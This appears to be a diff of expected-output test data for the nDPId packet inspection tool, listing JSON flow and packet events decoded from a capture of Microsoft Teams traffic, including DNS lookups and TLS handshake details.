00878{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1158,"source":"teams.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041682376,"flow_last_seen":1587041682423,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":236,"flow_tot_l4_payload_len":236,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1587041682423,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.76.48","src_port":60544,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"northeurope.notifications.teams.microsoft.com","ja3":"ebf5e0e525258d7a8dcb54aa1564ecbd","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 00878{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1158,"source":"teams.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041682376,"flow_last_seen":1587041682423,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":236,"flow_tot_l4_payload_len":236,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1587041682423,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.76.48","src_port":60544,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"northeurope.notifications.teams.microsoft.com","ja3":"ebf5e0e525258d7a8dcb54aa1564ecbd","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
00822{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1159,"source":"teams.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1587041682440,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":321,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":321,"pkt_l4_len":287,"thread_ts_msec":1587041682440,"pkt":"\/\/\/\/\/\/\/\/2A0X1lWrCABFAAEzES9AAEARZ+LAqAAB\/\/\/\/\/wBEAEMBHwAAAQEGAHT\/ICoAAIAAAAAAAAAAAAAAAAAAAAAAANgNF9ZVqwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABjglNjNQEBNwIBAwwJVEwtU0cxMTZFPAlUTC1TRzExNkU9BwHYDRfWVav\/"} 00822{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1159,"source":"teams.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1587041682440,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":321,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":321,"pkt_l4_len":287,"thread_ts_msec":1587041682440,"pkt":"\/\/\/\/\/\/\/\/2A0X1lWrCABFAAEzES9AAEARZ+LAqAAB\/\/\/\/\/wBEAEMBHwAAAQEGAHT\/ICoAAIAAAAAAAAAAAAAAAAAAAAAAANgNF9ZVqwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABjglNjNQEBNwIBAwwJVEwtU0cxMTZFPAlUTC1TRzExNkU9BwHYDRfWVav\/"}
01502{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1185,"source":"teams.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1587041682369,"flow_last_seen":1587041682557,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4409,"flow_avg_l4_payload_len":489,"midstream":0,"thread_ts_msec":1587041682557,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60543,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobile.pipe.aria.microsoft.com","server_names":"*.events.data.microsoft.com,events.data.microsoft.com,*.pipe.aria.microsoft.com,pipe.skype.com,*.pipe.skype.com,*.mobile.events.data.microsoft.com,mobile.events.data.microsoft.com,*.events.data.msn.com,events.data.msn.com","ja3":"a1674500365bdd882188db63730e69a2","ja3s":"ae4edc6faf64d08308082ad26be60767","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft IT, CN=Microsoft IT TLS CA 4","subjectDN":"CN=*.events.data.microsoft.com","fingerprint":"33:B3:B7:E9:DA:25:F5:A0:04:E9:63:87:B6:FB:54:77:DB:ED:27:EB"}} 01502{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1185,"source":"teams.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1587041682369,"flow_last_seen":1587041682557,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4409,"flow_avg_l4_payload_len":489,"midstream":0,"thread_ts_msec":1587041682557,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60543,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobile.pipe.aria.microsoft.com","server_names":"*.events.data.microsoft.com,events.data.microsoft.com,*.pipe.aria.microsoft.com,pipe.skype.com,*.pipe.skype.com,*.mobile.events.data.microsoft.com,mobile.events.data.microsoft.com,*.events.data.msn.com,events.data.msn.com","ja3":"a1674500365bdd882188db63730e69a2","ja3s":"ae4edc6faf64d08308082ad26be60767","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft IT, CN=Microsoft IT TLS CA 4","subjectDN":"CN=*.events.data.microsoft.com","fingerprint":"33:B3:B7:E9:DA:25:F5:A0:04:E9:63:87:B6:FB:54:77:DB:ED:27:EB"}}
00361{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":1189,"source":"teams.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1587041682598,"pkt":"AYDCAAAAeCjKBfrMACZCQgMAAAAAAJAAeCjKBfrMAAAAAJAAeCjKBfrMgAEAAAYAAQAEAKWlpaWlpaWl"} 00347{"packet_event_id":1,"packet_event_name":"packet","packet_id":1189,"source":"teams.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1587041682598,"pkt":"AYDCAAAAeCjKBfrMACZCQgMAAAAAAJAAeCjKBfrMAAAAAJAAeCjKBfrMgAEAAAYAAQAEAKWlpaWlpaWl"}
00196{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":1189,"source":"teams.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1587041682611} 00182{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":1189,"source":"teams.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1587041682611}
00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1193,"source":"teams.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041682668,"flow_last_seen":1587041682668,"flow_idle_time":180000,"flow_min_l4_payload_len":58,"flow_max_l4_payload_len":58,"flow_tot_l4_payload_len":58,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1587041682668,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":57530,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1193,"source":"teams.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041682668,"flow_last_seen":1587041682668,"flow_idle_time":180000,"flow_min_l4_payload_len":58,"flow_max_l4_payload_len":58,"flow_tot_l4_payload_len":58,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1587041682668,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":57530,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00515{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1193,"source":"teams.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":1,"flow_last_seen":1587041682668,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":100,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":100,"pkt_l4_len":66,"thread_ts_msec":1587041682668,"pkt":"EBMx8Tl2KDc3AG3ICABFAABW2rQAAP8RXYrAqAEGwKgBAeC6ADUAQqKILzcBAAABAAAAAAAACHByZXNlbmNlCHNlcnZpY2VzA3NmYg50cmFmZmljbWFuYWdlcgNuZXQAAAEAAQ=="} 00515{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1193,"source":"teams.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":1,"flow_last_seen":1587041682668,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":100,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":100,"pkt_l4_len":66,"thread_ts_msec":1587041682668,"pkt":"EBMx8Tl2KDc3AG3ICABFAABW2rQAAP8RXYrAqAEGwKgBAeC6ADUAQqKILzcBAAABAAAAAAAACHByZXNlbmNlCHNlcnZpY2VzA3NmYg50cmFmZmljbWFuYWdlcgNuZXQAAAEAAQ=="}
00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1193,"source":"teams.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041682668,"flow_last_seen":1587041682668,"flow_idle_time":180000,"flow_min_l4_payload_len":58,"flow_max_l4_payload_len":58,"flow_tot_l4_payload_len":58,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1587041682668,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":57530,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Microsoft","breed":"Safe","category":"Web"},"dns": {"query":"presence.services.sfb.trafficmanager.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1193,"source":"teams.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041682668,"flow_last_seen":1587041682668,"flow_idle_time":180000,"flow_min_l4_payload_len":58,"flow_max_l4_payload_len":58,"flow_tot_l4_payload_len":58,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1587041682668,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":57530,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Microsoft","breed":"Safe","category":"Web"},"dns": {"query":"presence.services.sfb.trafficmanager.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
@@ -199,12 +199,12 @@
00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1493,"source":"teams.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":2,"flow_last_seen":1587041683378,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1587041683378,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8VAJAAGwGd3g0ck0hwKgBBgG77IQbiSB\/F+H6CKASIABpjQAAAgQFoAEDAwgEAggKYR77TDCEshI="} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1493,"source":"teams.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":2,"flow_last_seen":1587041683378,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1587041683378,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8VAJAAGwGd3g0ck0hwKgBBgG77IQbiSB\/F+H6CKASIABpjQAAAgQFoAEDAwgEAggKYR77TDCEshI="}
00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1494,"source":"teams.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":3,"flow_last_seen":1587041683379,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041683379,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG94LAqAEGNHJNIeyEAbsX4foIG4kggIAQEAmoEAAAAQEICjCEsj9hHvtM"} 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1494,"source":"teams.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":3,"flow_last_seen":1587041683379,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041683379,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG94LAqAEGNHJNIeyEAbsX4foIG4kggIAQEAmoEAAAAQEICjCEsj9hHvtM"}
00973{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1495,"source":"teams.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041683333,"flow_last_seen":1587041683379,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":206,"flow_tot_l4_payload_len":206,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1587041683379,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60548,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobile.pipe.aria.microsoft.com","ja3":"a1674500365bdd882188db63730e69a2","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 00973{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1495,"source":"teams.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041683333,"flow_last_seen":1587041683379,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":206,"flow_tot_l4_payload_len":206,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1587041683379,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60548,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobile.pipe.aria.microsoft.com","ja3":"a1674500365bdd882188db63730e69a2","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
00372{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":1499,"source":"teams.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":34969,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1587041683396,"pkt":"\/\/\/\/\/\/\/\/2A0X1lWriJklgAAA2A0X1lWrAACAAADYDRfWVauACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"} 00358{"packet_event_id":1,"packet_event_name":"packet","packet_id":1499,"source":"teams.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":34969,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1587041683396,"pkt":"\/\/\/\/\/\/\/\/2A0X1lWriJklgAAA2A0X1lWrAACAAADYDRfWVauACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"}
00199{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":1499,"source":"teams.pcap","alias":"nDPId-test","layer_type":34969,"global_ts_msec":1587041683406} 00185{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":1499,"source":"teams.pcap","alias":"nDPId-test","layer_type":34969,"global_ts_msec":1587041683406}
01502{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1503,"source":"teams.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1587041683333,"flow_last_seen":1587041683431,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4409,"flow_avg_l4_payload_len":551,"midstream":0,"thread_ts_msec":1587041683431,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60548,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobile.pipe.aria.microsoft.com","server_names":"*.events.data.microsoft.com,events.data.microsoft.com,*.pipe.aria.microsoft.com,pipe.skype.com,*.pipe.skype.com,*.mobile.events.data.microsoft.com,mobile.events.data.microsoft.com,*.events.data.msn.com,events.data.msn.com","ja3":"a1674500365bdd882188db63730e69a2","ja3s":"ae4edc6faf64d08308082ad26be60767","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft IT, CN=Microsoft IT TLS CA 4","subjectDN":"CN=*.events.data.microsoft.com","fingerprint":"33:B3:B7:E9:DA:25:F5:A0:04:E9:63:87:B6:FB:54:77:DB:ED:27:EB"}} 01502{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1503,"source":"teams.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1587041683333,"flow_last_seen":1587041683431,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4409,"flow_avg_l4_payload_len":551,"midstream":0,"thread_ts_msec":1587041683431,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60548,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobile.pipe.aria.microsoft.com","server_names":"*.events.data.microsoft.com,events.data.microsoft.com,*.pipe.aria.microsoft.com,pipe.skype.com,*.pipe.skype.com,*.mobile.events.data.microsoft.com,mobile.events.data.microsoft.com,*.events.data.msn.com,events.data.msn.com","ja3":"a1674500365bdd882188db63730e69a2","ja3s":"ae4edc6faf64d08308082ad26be60767","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft IT, CN=Microsoft IT TLS CA 4","subjectDN":"CN=*.events.data.microsoft.com","fingerprint":"33:B3:B7:E9:DA:25:F5:A0:04:E9:63:87:B6:FB:54:77:DB:ED:27:EB"}}
00876{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1516,"source":"teams.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1587041683186,"flow_last_seen":1587041683511,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":10374,"flow_avg_l4_payload_len":324,"midstream":0,"thread_ts_msec":1587041683511,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.88.59","src_port":60547,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"chatsvcagg.teams.microsoft.com","ja3":"ebf5e0e525258d7a8dcb54aa1564ecbd","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 00876{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1516,"source":"teams.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1587041683186,"flow_last_seen":1587041683511,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":10374,"flow_avg_l4_payload_len":324,"midstream":0,"thread_ts_msec":1587041683511,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.88.59","src_port":60547,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"chatsvcagg.teams.microsoft.com","ja3":"ebf5e0e525258d7a8dcb54aa1564ecbd","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
00361{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":1533,"source":"teams.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1587041683605,"pkt":"AYDCAAAAeCjKBfrMACZCQgMAAAAAAJAAeCjKBfrMAAAAAJAAeCjKBfrMgAEAAAYAAQAEAKWlpaWlpaWl"} 00347{"packet_event_id":1,"packet_event_name":"packet","packet_id":1533,"source":"teams.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1587041683605,"pkt":"AYDCAAAAeCjKBfrMACZCQgMAAAAAAJAAeCjKBfrMAAAAAJAAeCjKBfrMgAEAAAYAAQAEAKWlpaWlpaWl"}
00196{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":1533,"source":"teams.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1587041683611} 00182{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":1533,"source":"teams.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1587041683611}
00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1685,"source":"teams.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041684291,"flow_last_seen":1587041684291,"flow_idle_time":180000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":38,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1587041684291,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":59403,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1685,"source":"teams.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041684291,"flow_last_seen":1587041684291,"flow_idle_time":180000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":38,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1587041684291,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":59403,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1685,"source":"teams.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":1,"flow_last_seen":1587041684291,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":80,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":80,"pkt_l4_len":46,"thread_ts_msec":1587041684291,"pkt":"EBMx8Tl2KDc3AG3ICABFAABC19sAAP8RYHfAqAEGwKgBAegLADUALnZLN+4BAAABAAAAAAAACXN1YnN0cmF0ZQZvZmZpY2UDY29tAAABAAE="} 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1685,"source":"teams.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":1,"flow_last_seen":1587041684291,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":80,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":80,"pkt_l4_len":46,"thread_ts_msec":1587041684291,"pkt":"EBMx8Tl2KDc3AG3ICABFAABC19sAAP8RYHfAqAEGwKgBAegLADUALnZLN+4BAAABAAAAAAAACXN1YnN0cmF0ZQZvZmZpY2UDY29tAAABAAE="}
00789{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1685,"source":"teams.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041684291,"flow_last_seen":1587041684291,"flow_idle_time":180000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":38,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1587041684291,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":59403,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Microsoft365","breed":"Acceptable","category":"Collaborative"},"dns": {"query":"substrate.office.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00789{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1685,"source":"teams.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041684291,"flow_last_seen":1587041684291,"flow_idle_time":180000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":38,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1587041684291,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":59403,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Microsoft365","breed":"Acceptable","category":"Collaborative"},"dns": 